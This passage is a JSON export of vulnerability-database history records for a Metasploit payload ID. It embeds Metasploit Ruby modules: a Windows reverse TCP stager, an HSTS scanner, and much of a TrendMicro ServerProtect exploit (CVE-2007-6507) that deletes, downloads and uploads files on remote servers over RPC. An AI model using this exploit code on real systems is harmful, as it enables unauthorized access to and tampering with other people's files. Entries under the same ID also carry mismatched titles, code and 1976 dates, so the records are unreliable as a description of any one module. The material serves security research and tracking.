"TALOSBLOG:447DDD14CB51AB5B358C002E9398C9F5"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:30E6F331B0933D74F30CE6FBDFB8F0BA"]}, {"type": "thn", "idList": ["THN:7F6095CDC4316E31C321DF2BCD6B3AB3"]}, {"type": "ics", "idList": ["ICSA-19-262-01"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154547"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815473", "OPENVAS:1361412562310876810", "OPENVAS:1361412562310876814"]}], "modified": "2019-09-23T16:15:00"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-23T16:15:00", "differentElements": ["modified", "published"], "edition": 31}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "782981c5f3ef7ed2032227c6b3eba8ad", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-07T12:01:37", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 3.2, "vector": "NONE", "modified": "2019-10-07T12:01:37"}, "dependencies": {"references": [{"type": "pentestlab", "idList": ["PENTESTLAB:4D7ADE73C6CAD943F1DDC37596BA1E4B"]}, {"type": "exploitdb", "idList": ["EDB-ID:47467", "EDB-ID:47468", "EDB-ID:47470", "EDB-ID:47471"]}, {"type": "jakearchibald", "idList": ["JAKEARCHIBALD:AE099BFD5E48A6EC3AAB5E2D141B3F6D"]}, {"type": "kitploit", "idList": ["KITPLOIT:7944621450687180670", "KITPLOIT:1929283733434729640"]}, {"type": "cve", "idList": ["CVE-2019-17199", "CVE-2019-17180", "CVE-2019-15162"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154738", "PACKETSTORM:154735", "PACKETSTORM:154736", "PACKETSTORM:154737"]}, {"type": "hackread", "idList": ["HACKREAD:5A404B45E6DC5DB911C89C0F6D2D235D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5757EE09BE22E4808719C348402D3F43"]}, {"type": "mskb", "idList": ["KB4516065", "KB4516033"]}, {"type": "mssecure", "idList": ["MSSECURE:8DF3393BE9822660F1B18B7D7DCD3AC4"]}], "modified": "2019-10-07T12:01:37"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-07T12:01:37", "differentElements": ["modified", "published"], "edition": 32}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-07T15:19:01", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 3.2, "vector": "NONE", "modified": "2019-10-07T15:19:01"}, "dependencies": {"references": [{"type": "pentestlab", "idList": ["PENTESTLAB:4D7ADE73C6CAD943F1DDC37596BA1E4B"]}, {"type": "exploitdb", "idList": ["EDB-ID:47467", "EDB-ID:47468", "EDB-ID:47471", "EDB-ID:47470"]}, {"type": "jakearchibald", "idList": ["JAKEARCHIBALD:AE099BFD5E48A6EC3AAB5E2D141B3F6D"]}, {"type": "kitploit", "idList": ["KITPLOIT:7944621450687180670", "KITPLOIT:1929283733434729640"]}, {"type": "cve", "idList": ["CVE-2019-17199", "CVE-2019-17180", "CVE-2019-15162"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154738", "PACKETSTORM:154735", "PACKETSTORM:154736", "PACKETSTORM:154737"]}, {"type": "hackread", "idList": ["HACKREAD:5A404B45E6DC5DB911C89C0F6D2D235D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5757EE09BE22E4808719C348402D3F43"]}, {"type": "mskb", "idList": ["KB4516065", "KB4516033"]}, {"type": "mssecure", "idList": ["MSSECURE:8DF3393BE9822660F1B18B7D7DCD3AC4"]}], "modified": "2019-10-07T15:19:01"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-07T15:19:01", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 33}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "61a5bcd44b19f458296abf70a18b7b71", "type": "metasploit", "bulletinFamily": "exploit", "title": "HTTP Strict Transport Security (HSTS) Detection", "description": "Display HTTP Strict Transport Security (HSTS) information about each system.\n", "published": "2012-11-30T14:30:11", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-15T22:02:15", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 3.2, "vector": "NONE", "modified": "2019-10-07T15:19:01"}, "dependencies": {"references": [{"type": "pentestlab", "idList": ["PENTESTLAB:4D7ADE73C6CAD943F1DDC37596BA1E4B"]}, {"type": "exploitdb", "idList": ["EDB-ID:47467", "EDB-ID:47468", "EDB-ID:47471", "EDB-ID:47470"]}, {"type": "jakearchibald", "idList": ["JAKEARCHIBALD:AE099BFD5E48A6EC3AAB5E2D141B3F6D"]}, {"type": "kitploit", "idList": ["KITPLOIT:7944621450687180670", "KITPLOIT:1929283733434729640"]}, {"type": "cve", "idList": ["CVE-2019-17199", "CVE-2019-17180", "CVE-2019-15162"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154738", "PACKETSTORM:154735", "PACKETSTORM:154736", "PACKETSTORM:154737"]}, {"type": "hackread", "idList": ["HACKREAD:5A404B45E6DC5DB911C89C0F6D2D235D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5757EE09BE22E4808719C348402D3F43"]}, {"type": "mskb", "idList": ["KB4516065", "KB4516033"]}, {"type": "mssecure", "idList": ["MSSECURE:8DF3393BE9822660F1B18B7D7DCD3AC4"]}], "modified": "2019-10-07T15:19:01"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/http_hsts.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'HTTP Strict Transport Security (HSTS) Detection',\n 'Description' => %q{\n Display HTTP Strict Transport Security (HSTS) information about each system.\n },\n 'Author' => 'Matt \"hostess\" Andreko <mandreko[at]accuvant.com>',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n ))\n\n register_options([\n Opt::RPORT(443)\n ])\n end\n\n def run_host(ip)\n begin\n res = send_request_cgi({\n 'uri' => '/',\n 'method' => 'GET',\n }, 25)\n\n if res\n hsts = res.headers['Strict-Transport-Security']\n\n if hsts\n print_good(\"#{ip}:#{rport} - Strict-Transport-Security:#{hsts}\")\n report_note({\n :data => hsts,\n :type => \"hsts.data\",\n :host => ip,\n :port => rport\n })\n else\n print_error(\"#{ip}:#{rport} No HSTS found.\")\n end\n else\n print_error(\"#{ip}:#{rport} No headers were returned.\")\n end\n\n rescue ::Timeout::Error, ::Errno::EPIPE\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-15T22:02:15", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 34}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-16T00:32:21", "history": [], "viewCount": 12, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2019-10-16T00:32:21"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:8EB884B880A80E689744A516A7A41E38", "THREATPOST:1A63205DD8F6EE3AD36956AA8B2624E5"]}, {"type": "kitploit", "idList": ["KITPLOIT:6910250162001955125", "KITPLOIT:5655524805475386986", "KITPLOIT:2505267191039065451", "KITPLOIT:7691462746351557369"]}, {"type": "mskb", "idList": ["KB4511553", "KB4507435", "KB4503286", "KB4516033", "KB4516044", "KB4512578", "KB4516058"]}, {"type": "thn", "idList": ["THN:CBF6006B338B7F10D2111698075C0C39"]}, {"type": "paloalto", "idList": ["PAN-SA-2019-0036"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154851"]}, {"type": "exploitdb", "idList": ["EDB-ID:47503"]}, {"type": "symantec", "idList": ["SMNTC-110420", "SMNTC-110417"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:9E4EC6469D99F0778B70025C8760BFDE"]}], "modified": "2019-10-16T00:32:21"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-16T00:32:21", "differentElements": ["modified", "published"], "edition": 35}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "782981c5f3ef7ed2032227c6b3eba8ad", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-11-21T19:25:26", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2019-11-21T19:25:26"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:597800CEAF4F4832B357C491661792B5", "THREATPOST:E00DA222DAC876747F9911778DDC997F", "THREATPOST:B9A717DA93642284A9408C7A11D5714E"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:A945F3BF130B3EBF81C9BAB217460EB7"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:06ED86BC5FE8565621F6AE9C50A76CB4"]}, {"type": "kitploit", "idList": ["KITPLOIT:7044561031766565764", "KITPLOIT:137665143701353068"]}, {"type": "exploitdb", "idList": ["EDB-ID:47702", "EDB-ID:47704", "EDB-ID:47698"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155428", "PACKETSTORM:155422"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:92BAA97414824FCFD7415368441F952B"]}, {"type": "cisco", "idList": ["CISCO-SA-20191120-WEBEX-TEAMS-DLL"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:5085413858A32D1D784A1CBD8DF765D8"]}, {"type": "securelist", "idList": ["SECURELIST:A2AE2595A5AE466397487EF9A96F6652"]}, {"type": "thn", "idList": ["THN:807F9F40C7FDF88824233F1436974D0E"]}, {"type": "mskb", "idList": ["KB921896"]}, {"type": "nessus", "idList": ["ITUNES_12_10_2.NASL"]}, {"type": "symantec", "idList": ["SMNTC-110927"]}], "modified": "2019-11-21T19:25:26"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-21T19:25:26", "differentElements": ["modified", "published"], "edition": 36}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-11-21T21:22:39", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2019-11-21T21:22:39"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:597800CEAF4F4832B357C491661792B5", "THREATPOST:E00DA222DAC876747F9911778DDC997F", "THREATPOST:B9A717DA93642284A9408C7A11D5714E"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:A945F3BF130B3EBF81C9BAB217460EB7"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:06ED86BC5FE8565621F6AE9C50A76CB4"]}, {"type": "kitploit", "idList": ["KITPLOIT:7044561031766565764", "KITPLOIT:137665143701353068"]}, {"type": "exploitdb", "idList": ["EDB-ID:47702", "EDB-ID:47704", "EDB-ID:47698"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155428", "PACKETSTORM:155422"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:92BAA97414824FCFD7415368441F952B"]}, {"type": "cisco", "idList": ["CISCO-SA-20191120-WEBEX-TEAMS-DLL"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:5085413858A32D1D784A1CBD8DF765D8"]}, {"type": "securelist", "idList": ["SECURELIST:A2AE2595A5AE466397487EF9A96F6652"]}, {"type": "thn", "idList": ["THN:807F9F40C7FDF88824233F1436974D0E"]}, {"type": "mskb", "idList": ["KB921896"]}, {"type": "nessus", "idList": ["ITUNES_12_10_2.NASL"]}, {"type": "symantec", "idList": ["SMNTC-110927"]}], "modified": "2019-11-21T21:22:39"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-21T21:22:39", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 37}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "20a65010c3738dd1e9919f418cdd0b30", "type": "metasploit", "bulletinFamily": "exploit", "title": "TrendMicro ServerProtect File Access", "description": "This modules exploits a remote file access flaw in the ServerProtect Windows Server RPC service. Please see the action list (or the help output) for more information.\n", "published": "2008-01-28T03:06:31", "modified": "2017-07-24T13:26:21", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6507"], "cvelist": ["CVE-2007-6507"], "lastseen": "2019-11-22T05:30:29", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2019-11-22T05:30:29"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-6507"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SERVERPROTECT/FILE"]}, {"type": "zdi", "idList": ["ZDI-07-077"]}], "modified": "2019-11-22T05:30:29"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/serverprotect/file.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::DCERPC\n include Msf::Post::Windows::Registry\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'TrendMicro ServerProtect File Access',\n 'Description' => %q{\n This modules exploits a remote file access flaw in the ServerProtect Windows\n Server RPC service. Please see the action list (or the help output) for more\n information.\n },\n 'DefaultOptions' =>\n {\n 'DCERPC::ReadTimeout' => 300 # Long-running RPC calls\n },\n 'Author' => [ 'toto' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2007-6507' ],\n [ 'OSVDB', '44318' ],\n [ 'ZDI', '07-077'],\n ],\n 'Actions' =>\n [\n [ 'delete' ],\n [ 'download' ],\n [ 'upload' ],\n [ 'list' ]\n ]\n ))\n\n register_options(\n [\n Opt::RPORT(5168),\n OptString.new('RPATH',\n [\n false,\n \"The remote filesystem path\",\n nil\n ]),\n OptString.new('LPATH',\n [\n false,\n \"The local filesystem path\",\n nil\n ]),\n ])\n end\n\n def check_option(name)\n if(not datastore[name])\n raise RuntimeError, \"The #{name} parameter is required by this option\"\n end\n end\n\n def auxiliary_commands\n {\n \"delete\" => \"Delete a file\",\n \"download\" => \"Download a file\",\n \"upload\" => \"Upload a file\",\n \"list\" => \"List files (not recommended - will crash the driver)\",\n }\n end\n\n def run\n case action.name\n when 'download'\n check_option('RPATH')\n check_option('LPATH')\n cmd_download(datastore['RPATH'], datastore['LPATH'])\n when 'upload'\n check_option('RPATH')\n check_option('LPATH')\n cmd_upload(datastore['RPATH'], datastore['LPATH'])\n when 'delete'\n check_option('RPATH')\n cmd_delete(datastore['RPATH'])\n when 'list'\n check_option('RPATH')\n cmd_list(datastore['RPATH'])\n else\n print_error(\"Unknown action #{action.name}\")\n end\n end\n\n def deunicode(str)\n str.gsub(/\\x00/, '').strip\n end\n\n #\n # Once this function is used, if cmd_download or cmd_upload is called the server will crash :/\n #\n def cmd_list(*args)\n\n if (args.length < 1)\n print_status(\"Usage: list folder\")\n return\n end\n\n file = Rex::Text.to_unicode(args[0])\n\n data = \"\\0\" * 0x100\n data[4, file.length] = file\n\n # FindFirstFile\n resp = serverprotect_rpccmd(131080, data, 0x100)\n return if not resp\n\n if resp.length != 0x108\n print_error(\"An unknown error occurred while calling FindFirstFile.\")\n return\n end\n\n\n ret, = resp[0x104,4].unpack('V')\n if ret != 0\n print_error(\"An error occurred while calling FindFirstFile #{args[0]}: #{ret}.\")\n return\n end\n\n handle, = resp[4,4].unpack('V')\n\n file = deunicode(resp[0x30, 0xd0])\n print(\"#{file}\\n\")\n\n data = \"\\0\" * 0x100\n data[0,4] = [handle].pack('V')\n\n while true\n # FindNextFile\n resp = serverprotect_rpccmd(131081, data, 0x100)\n return if not resp\n\n if resp.length != 0x108\n print_error(\"An unknown error occurred while calling FindFirstFile.\")\n break\n end\n\n ret, = resp[0x104,4].unpack('V')\n if ret != 0\n break\n end\n\n file = deunicode(resp[0x30, 0xd0])\n print(\"#{file}\\n\")\n end\n\n data = \"\\0\" * 0x100\n data = [handle].pack('V')\n # FindClose\n resp = serverprotect_rpccmd(131082, data, 0x100)\n end\n\n\n def cmd_delete(*args)\n\n if (args.length == 0)\n print_status(\"Usage: delete c:\\\\windows\\\\system.ini\")\n return\n end\n\n data = Rex::Text.to_unicode(args[0]+\"\\0\")\n resp = serverprotect_rpccmd(131077, data, 4)\n return if not resp\n\n if (resp.length == 12)\n ret, = resp[8,4].unpack('V')\n\n if ret == 0\n print_good(\"File #{args[0]} successfully deleted.\")\n else\n print_error(\"An error occurred while deleting #{args[0]}: #{ret}.\")\n end\n end\n\n end\n\n\n def cmd_download(*args)\n\n if (args.length < 2)\n print_status(\"Usage: download remote_file local_file\")\n return\n end\n\n # GENERIC_READ: 0x80000000\n # FILE_SHARE_READ: 1\n # OPEN_EXISTING: 3\n # FILE_ATTRIBUTE_NORMAL: 0x80\n handle = serverprotect_createfile(args[0], 0x80000000, 1, 3, 0x80)\n if (not handle or handle == 0)\n return\n end\n\n fd = File.new(args[1], \"wb\")\n\n print_status(\"Downloading #{args[0]}...\")\n\n # reads 0x1000 bytes (hardcoded in the soft)\n while ((data = serverprotect_readfile(handle)).length > 0)\n fd.write(data)\n end\n\n fd.close\n\n serverprotect_closehandle(handle)\n\n print_good(\"File #{args[0]} successfully downloaded.\")\n end\n\n\n def cmd_upload(*args)\n\n if (args.length < 2)\n print_status(\"Usage: upload local_file remote_file\")\n return\n end\n\n # GENERIC_WRITE: 0x40000000\n # FILE_SHARE_WRITE: 2\n # CREATE_ALWAYS: 2\n # FILE_ATTRIBUTE_NORMAL: 0x80\n handle = serverprotect_createfile(args[1], 0x40000000, 2, 2, 0x80)\n if (handle == 0)\n return\n end\n\n fd = File.new(args[0], \"rb\")\n\n print_status(\"Uploading #{args[1]}...\")\n\n # write 0x1000 bytes (hardcoded in the soft)\n while ((data = fd.read(0x1000)) != nil)\n serverprotect_writefile(handle, data)\n end\n\n fd.close\n\n serverprotect_closehandle(handle)\n\n print_good(\"File #{args[1]} successfully uploaded.\")\n end\n\n\n def serverprotect_createfile(file, desiredaccess, sharemode, creationdisposition, flags)\n data = \"\\0\" * 540\n file = Rex::Text.to_unicode(file)\n data[4, file.length] = file\n data[524, 16] = [desiredaccess, sharemode, creationdisposition, flags].pack('VVVV')\n\n resp = serverprotect_rpccmd(131073, data, 540)\n return if not resp\n\n if (resp.length < 548)\n print_error(\"An unknown error occurred while calling CreateFile.\")\n return 0\n else\n handle, = resp[4,4].unpack('V')\n ret, = resp[544,4].unpack('V')\n\n if ret != 0\n print_error(\"An error occurred while calling CreateFile: #{ret}.\")\n return 0\n else\n return handle\n end\n end\n end\n\n\n def serverprotect_readfile(handle)\n data = \"\\0\" * 4104\n data[0, 4] = [handle].pack('V')\n\n resp = serverprotect_rpccmd(131075, data, 4104)\n return if not resp\n\n if (resp.length != 4112)\n print_error(\"An unknown error occurred while calling ReadFile.\")\n return ''\n else\n ret, = resp[4108,4].unpack('V')\n\n if ret != 0\n print_error(\"An error occurred while calling CreateFile: #{ret}.\")\n return ''\n else\n br, = resp[4104, 4].unpack('V')\n return resp[8, br]\n end\n end\n end\n\n\n def serverprotect_writefile(handle, buf)\n data = \"\\0\" * 4104\n data[0, 4] = [handle].pack('V')\n data[4, buf.length] = buf\n data[4100, 4] = [buf.length].pack('V')\n\n resp = serverprotect_rpccmd(131076, data, 4104)\n return if not resp\n\n if (resp.length != 4112)\n print_error(\"An unknown error occurred while calling WriteFile.\")\n return 0\n else\n ret, = resp[4108,4].unpack('V')\n\n if ret != 0\n print_error(\"An error occurred while calling WriteFile: #{ret}.\")\n return 0\n end\n end\n\n return 1\n end\n\n\n def serverprotect_closehandle(handle)\n data = [handle].pack('V')\n\n resp = serverprotect_rpccmd(131074, data, 4)\n return if not resp\n\n if (resp.length != 12)\n print_error(\"An unknown error occurred while calling CloseHandle.\")\n else\n ret, = resp[8,4].unpack('V')\n\n if ret != 0\n print_error(\"An error occurred while calling CloseHandle: #{ret}.\")\n end\n end\n end\n\n\n def serverprotect_rpccmd(cmd, data, osize)\n if (data.length.remainder(4) != 0)\n 